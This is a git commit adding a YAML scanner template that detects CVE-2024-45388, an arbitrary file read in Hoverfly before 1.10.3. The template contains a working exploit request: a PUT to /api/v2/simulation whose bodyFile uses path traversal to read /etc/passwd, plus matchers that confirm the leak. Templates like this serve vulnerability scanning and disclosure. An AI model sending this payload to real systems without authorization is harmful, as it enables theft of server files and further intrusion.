Create CVE-2024-45388.yaml

patch-11
Ritik Chaddha 2024-09-06 18:54:38 +04:00 committed by GitHub
parent 31e3feea8d
commit 3538485407
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 46 additions and 0 deletions

View File

@ -0,0 +1,46 @@
id: CVE-2024-45388
info:
name: Hoverfly < 1.10.3 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
reference:
- https://github.com/advisories/GHSA-6xx4-x46f-f897
- https://nvd.nist.gov/vuln/detail/CVE-2024-45388
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-45388
cwe-id: CWE-20
metadata:
max-request: 1
verified: true
tags: cve,cve2024,hoverfly,lfi
http:
- raw:
- |
PUT /api/v2/simulation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- 'hoverflyVersion'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200